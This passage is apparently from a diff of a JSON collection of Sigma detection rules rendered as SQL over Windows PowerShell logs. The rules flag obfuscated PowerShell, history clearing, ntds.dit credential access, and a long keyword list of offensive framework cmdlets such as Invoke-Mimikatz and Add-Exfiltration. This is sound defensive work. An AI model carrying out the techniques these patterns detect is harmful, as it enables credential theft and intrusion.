Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of the tool" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' 
ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", - "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs 
WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", - "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "PowerShell 
Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "status": "experimental", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + 
"Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", 
@@ -4177,1440 +3981,1493 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' 
AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, 
{ - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", - "status": "test", - "description": "Detects backup catalog 
deletions", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", - "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + 
"attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE 
'%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload 
